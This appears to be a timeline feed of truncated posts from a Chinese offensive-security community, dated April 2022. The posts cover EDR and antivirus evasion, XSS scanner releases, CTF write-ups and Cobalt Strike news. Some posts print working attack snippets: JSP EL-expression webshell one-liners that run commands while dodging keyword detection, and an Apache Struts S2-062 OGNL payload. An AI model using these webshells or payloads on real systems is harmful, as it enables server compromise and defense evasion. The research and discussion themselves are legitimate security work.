当前节点:zsxq
时间节点
2022年4月27日 18:12知识星球
2022年4月27日 15:45知识星球
#推荐 #A.B.U https://bohops.com/2021/03/16/investigating-net-cl... .Net 中规避 EDR 的一些认识: EDR 的监控很大程度上依赖于 CLR 产生的 “UsageLogs" 日志 日志什么时候产生:程序集在用户会话上下文首次完成执行后 日志产生在什...
2022年4月27日 15:23知识星球
Investigating .NET CLR Usage Log Tampering Techniq... .Net 中规避 EDR 的一些认识: EDR 的监控很大程度上依赖于 CLR 产生的 “UsageLogs" 日志 日志什么时候产生:程序集在用户会话上下文首次完成执行后 日志产生在什么位置:注册表...
2022年4月27日 13:39知识星球
引用 "爱上你的笑容 提问:Hello您好 我看了那个mullet扫描器运行的时候 带上任何网址都是提示ERROR网址不可访问 不知道怎么回事"
截图...
2022年4月27日 13:17知识星球
ATT&CK v11发布了 除了添加了像进程参数欺骗等攻击技术,还加强了检测技术的映射和结构化 https://attack.mitre.org/resources/...
2022年4月27日 11:33知识星球
我的xss bugbounty自动化步骤 尽量选国外bugbounty平台,hackerone,bugcrowd,yeswehack等,它们对xss的赏金高,并且对bughunter也很友好 扫描服务器我用的板瓦工,xscan有时候内存爆炸会被系统killer,我用shell写了个守护进程,xscan即时挂掉了他重启会自动读取上一个目标。 我是这样做的 1. 确定子域名范围,从平台上获取子域名范围 2. 被动收集+主动DNS探测,通过subfinder+...
2022年4月27日 11:11知识星球
xscan继续发布新版- - ,其实早就更新好了,自己测试了几天,效果太棒了,已经刷了好几个hackerone和国内src了。如果你也刷到了,记得请我喝咖啡☕️~ 检测反射xss,现在支持对uri,header,cookie,pos...
附件:xscan_0.8_linux_amd64.zip
2022年4月26日 21:32知识星球
#武器构建 今天在写golang的win32 inline hook的时候发现了一个技巧。在syscall包中有一...
2022年4月26日 18:23知识星球
最近在搞Java的拒绝服务漏洞,简单写了篇水文总结
附件:反序列化漏洞的防御与拒绝服务.pdf
2022年4月26日 14:53知识星球
intigriti新出的challenge,猜到是原型链污染的题,但是许多...
附件:intigriti-0422-XSS-Challenge-Write-up.pdf
2022年4月26日 14:53知识星球
intigriti新出的challenge,猜到是原型链污染的题,但是许多...
附件:intigriti-0422-XSS-Challenge-Write-up.pdf
2022年4月26日 11:23知识星球
点赞 渗透测试手册 - Pentest Handbook
2022年4月26日 10:41知识星球
2个月前开始学java然后se学完学ee学jsp,中间也跟着看了几个漏洞,昨天刚把cc1链搞清楚 今天突然想起来p神的知识...
2022年4月26日 00:11知识星球
菜鸡第一次发文章,大佬们轻点喷 主要是研究一下一下AspectJWeaver 反序列...
附件:2022MRCTF-ezjava的一点小研究.pdf
2022年4月25日 22:46知识星球
这周末打了个CTF质量还是挺不错的,这里分享下wp,简单做个总结 Springcoffee–Kryo反序...
附件:2022MRCTF-Java部分.pdf
2022年4月25日 22:46知识星球
这周末打了个CTF质量还是挺不错的,这里分享下wp,简单做个总结 Springcoffee–Kryo反序...
附件:2022MRCTF-Java部分.pdf
2022年4月25日 22:25知识星球
今天开始给大家带来一个新的系列,不是文章,用几百字以内的帖子给大家讲下#Webshell检测那些事。 众所周知我之前做Webshell检测做了两年。刚开始做那会国内基本还只有青藤云一家做新型Webshell检测引擎的公司,当时他们是率先办了一个绕过比赛,我参加并拿了第二名,好像奖金拿了5个多w。后面各家大厂基本都开始做自己的动态检测Webshell引擎,也都搞了一些活动,我有的参与了有的没参与,也拿过第一第二第三,但再也没拿过这么多钱的奖金了。 原因是什么呢?其实Webs...
附件:01. 缓存导致的绕过.pdf
2022年4月25日 18:13知识星球
记录一下cpuid指令看到的沙箱cpu信息 进行虚拟机探测的时候一般使用cpuid指令,执行CPUID时通过设置EAX = 0x40000000,会从EAX、ECX、EDX返回一些虚拟化厂商的相关字符串...
2022年4月25日 10:31知识星球
文章针对CodeQL分析无源码jar这种需求,提供了新的解决思路,并指出了CodeQL的一些不...
2022年4月24日 21:20知识星球
最近尝试用Semgrep审计代码,分享一下使用经验,规则编写非常...
附件:Semgrep代码审计体验.pdf
2022年4月24日 20:59知识星球
最近尝试用Semgrep审计代码,分享一下使用经验,规则编写非常...
附件:Semgrep代码审计体验.pdf
2022年4月24日 15:44知识星球
Netty Memshell
附件:NettyMemshell.txt
2022年4月24日 02:26知识星球
phantomjs虽然已经不更新了,作为爬虫之类的应对写新的网站可能有各种问题,但如果只是在收集资产的时...
2022年4月23日 18:02知识星球
对wso2的RCE简单的复现分析了下,还有很多的不足,希望各位师傅能提点提点
附件:WSO2 RCE 分析 CVE-2022-29464.pdf
2022年4月23日 18:02知识星球
基于header的xss。。 看到hackerone上基于header的xss是给钱的 Hacke...
2022年4月23日 09:59知识星球
#推荐 #CSTips GitHub - outflanknl/C2-Tool-Collection: A collecti... A collection of tools which integrate...
2022年4月22日 23:49知识星球
请问各位师傅,在杀毒软件环境下,dump lsass进程内存后的.dump文件老是被杀,想过加密,但无从下手?
2022年4月22日 19:58知识星球
2022年4月22日 17:31知识星球
在 https://t.zsxq.com/Iy7YVvn 的分享中,为了避免 jsp webshell 中出现 <% 等标记,使用了 el 表达式来实现,但是这样的问题是 el 表达式中还是会出现 Runtime、ScriptEngineManager 等关键词,即使使用反射也还一定会有 forName 的函数名的出现,可能会被关键词命中。 其实在 el 表达式中,是可以类似 js 一样,使用 `a["b"]` 或者 `a.b` 这两种方法来获取属性的,如果把函数名或者属性...
2022年4月22日 12:16知识星球
#问题解答 今天尝试审计代码时,遇到一个场景(可以上传图片马之类的,不能上传php文件,压缩文件上传后,不会解压的),自己刚入信息安全,不知道这个场景能不能getshell,下面是简化后的代码: <?php $path = __DIR__; $slug = $_GET['slug']; $file = $path."/"."{$slug}.php"; if(file_exists($file)){ echo "fil...
2022年4月22日 10:52知识星球
#杀软对抗 A blueprint for evading industry leading endpoint ... 粗浅整理...
2022年4月22日 10:10知识星球
OffensiveCon22 的视频更新了 https://www.youtube.com/playlist?list=PLYvhPWR_XYJ... 我比较感兴趣的是《OffensiveCon22 - James Forshaw -These Are My Principals, If You D...
2022年4月22日 09:28知识星球
昨天群里有小伙伴问关于 NTLM协议challenge 长度问题,很多文章,包括微软文档说的NTLM v1是8字节,v2是16字节,可实际测试都是8字节。 最后证明是微软文档错了,目前已修改 Micr...
2022年4月22日 00:30知识星球
上午问的那个ntlm认证,是微软文档错了,v2生成的CHALLENG就是八字节,微软已经修正了
2022年4月21日 22:24知识星球
之前对比了网上公开的所谓的CS4.5破解版与4.4原版,beacon.dll是一样的。CS4.6的介绍里也印证了此事。4.6的teamse...
2022年4月21日 18:53知识星球
#A.B.U #推荐 最近看到这篇关于注入规避的文章,作者也讲了 目前注入技术公开的检测手段大概有: 驱动回调PsSetCreateThreadNotifyRou...
2022年4月21日 18:11知识星球
师傅们想问一下 小白我在打靶场的过程中 使用msf碰到火绒不知道怎么bypass 这方面的知识在哪里学习啊
2022年4月21日 11:32知识星球
在研究ntlm认证过程,抓取smb交互包里面的ntlm认证,发现客户端给服务端的协商请求里面没有用户名,在服务端给客户端的CHALLENG是8字节的,但在微软说明ntlm协议的文档里面说 ...
2022年4月21日 11:11知识星球
xscan扫描器 第二版 1. 在第一版的基础上修复了一些bug 2. 新增了基于cookie扫描xss 3. 结果文件改为了...
附件:xscan_0.5_linux_amd64.zip
2022年4月21日 10:08知识星球
师傅们请问在打入内网后(非域环境)除了扫口令 正常的渗透之外 还有其他不同扩大战果的思路吗
2022年4月21日 08:23知识星球
#Cobaltstrike CS4.6发布了 https://www.cobaltstrike.com/blog/cobalt-strike-4-... 整体看来还是维持我的老观点,CS慢慢退出历史舞台了。 1. 从4.3以后,CS的更新属于挤牙膏,没有太亮点的更新。 2. 频繁换负责人,从第二任和现任负责人的履历看,不具备革命性创新能力 3. 老牌大公司会让CS越来越封闭 4. 外部其他公司新C2快速跟进中,例如mdsec 这次4.6更新主要在“自宫”上面,也就是防外...
2022年4月20日 21:53知识星球
引用 "鹏 提问:师傅,关于网站的负载均衡绕过,除了真实ip还有其他的方法吗,假如我要上传大型文件如何上传呢,分块上传感觉会传到其它的ip去。"
我说下我知道或者遇到过的方法,看其他同学还有没有方法 1. ...
2022年4月20日 15:14知识星球
利用 AWS官方对log4j漏洞的热补丁 实现容器逃逸,角度刁钻。 AWS's Log4Shell Hot Patch Vulnerable to Container ... 为了实现对容器中Java进程的patch,AWS的补丁会调用一些  container binaries ,首先会先调用容器中的Java来获取相关版本信息,再然后调用一次实现inject,然而在调用之前并没有做好合理的权限设置,用unit42的话来说: it was spawned wit...
2022年4月20日 14:53知识星球
引用 "匿名用户 提问:师傅有没有遇到过CS4.4配置好C2profile,结果stageless无法正常上线的情况呢"
1.你用c2lint先检查下配置文件是否证书 2.你cs4....
2022年4月20日 14:11知识星球
各位师傅们好,今天碰到了spring cloud gateway的场景,想着试试spel漏洞,路由应该创建成功了,返回的201状态码,但是在路由刷新的一步报了错,不知道什么情况求师傅们能解答一下 创建路由的POC用的这个: { "id": "hacktest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "R...
2022年4月20日 10:41知识星球
今天在群里讨论的一些关于go并发控制的知识点,做个记录📝 1. ratelimit 控制goroutine的创建的速度 2. GitHub - panjf2000/ants: 🐜🐜🐜 ants is a high-perfor... 协程池,控制goroutine的总量,防止创建过多消耗内存 3. sync.WaitGroup 控制gotinue是否消耗完 4. GitHub - remeh/sizedwaitgroup: SizedWaitGroup has ... 在...
2022年4月20日 00:52知识星球
前几天有人遇到了Tapestry4框架,就帮着一起看了下,emmm,08年就停止维护的框架,居然还有人用,就分析了下,大家看看就好。 分析核心点应该在如何定位service吧,并且还要配合模板userinput...
2022年4月20日 00:52知识星球
其实正常遇到 H4sI 等开头应该都会很敏感的想到可能存在反序列化。不过这里可以看到开头有个Z 这是因为在 tap中 org.apache.tapestry.util.io.SqueezeAdaptor public class SerializableAdaptor implements SqueezeAdaptor { private static ...
2022年4月19日 19:58知识星球
请教一下各位大帅比,如何检测端口(全部)被访问时,记录下访问者的ip。比如...
2022年4月19日 16:07知识星球
引用 "专业端茶倒水30年 提问:8师傅,现在公司扫描器有个加代理进行扫描的需求(扫描器是python实现),但是端口扫描这块使用的是masscan加nmap,这两个工具如何能使用代理去扫描呢? 日后如果换go的话,对于端口扫描这块加代理又有什么好的思路呢?或者8师傅有没什么好的可以替代masscan和nmap的工具呀。(万分感谢!)"
1. 第一种方案是在环境里加上全局代理 2. 第二种方案就是...
2022年4月19日 15:46知识星球
#杀软对抗 A blueprint for evading industry leading endpoint...
2022年4月19日 14:43知识星球
#红队技巧 #防御绕过 跟大家分享一篇技术文章《滥用具备RWX-S权限且有签名的dll进行无感知的shellcode注入》 滥用具备RW...
2022年4月19日 11:13知识星球
最近想学习关于恶意代码分析的知识,比较迷茫,没什么思路,不知道看什么书籍,我的个人需求为 1.比如windows系统中了木马,这个木马在系统里做了什么,在注册表做了什么,建立了什么服务等等 2.木马如果下载其他恶意软件,究竟下载了什么 3.木马如果连接远程服务器,如何找出远程服务器具体ip或者域名,排除抓包方式,就是通过分析代码 4. 木马究竟...
2022年4月18日 23:47知识星球
xscan 发布~ 这是基于第四期作业做的成品,爬虫+xss扫描的结合, 刷src神器!后面会根据反馈更新。 只需要输入一个url,爬虫便会一直爬,没有停止条件。爬虫实现了智能过滤去重复算法,不用担心重复url问题,为了防止内存过多,占用内存大的数据结构都会以文件的形式缓存。 爬虫的同时会进行xss测试,目前仅反射型xss模块,类似xray的xss扫描,基于语义扫描反射xss漏洞,xscan会从html和javascript的语法解析层面处理,比xray更快,更...
附件:xscan_0.2_windows_386.zip
2022年4月18日 16:26知识星球
分享个周末打的XCTF比赛,其中有意思点的是控制环境变量劫持wget的那题
附件:2022-*CTF-Web.pdf
2022年4月18日 15:02知识星球
s2-062无回显的检测payload %{(#request.map=@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +(#request.map2=@org.apache.commons.colle...
2022年4月18日 10:50知识星球
师傅们问一下 脚本小子一个最近刚自学了完java框架可以比这抄小项目 看java安全还是一头雾水怎么办
2022年4月18日 00:20知识星球
构建jsp webshell的一个trick 因为jsp中可以使用el表达式 所以我们可以使用和el表达式注入一样的方法构造webshell 可以避免出现 <%符号 ${Runtime.getRuntime().exec(param.a)} 无回显执行 没错就这么短 这才叫一句话 嘛 ) ${''.getClass().forName(param.aef).newInstance().getEngineByName("javascript")...
2022年4月17日 23:59知识星球
构建jsp webshell的一个trick 因为jsp中可以使用el表达式 所以我们可以使用和el表达式注入一样的方法构造webshell 可以避免出现 <%符号 ${Runtime.getRuntime().exec(param.a)} 无回显执行 没错就这么短 这才叫一句话 嘛 ) ${''.getClass().forName(param.aef).newInstance().getEngineByName("javascript").eval...
2022年4月17日 19:26知识星球
一个jd xss(未完成) 做第四期作业,为了方便测试写了一个爬虫对接xss自动扫描,爬虫没有设置结束条件,爬虫无尽的爬,爬到天荒地老。找到一个 jd的xss,但还是要...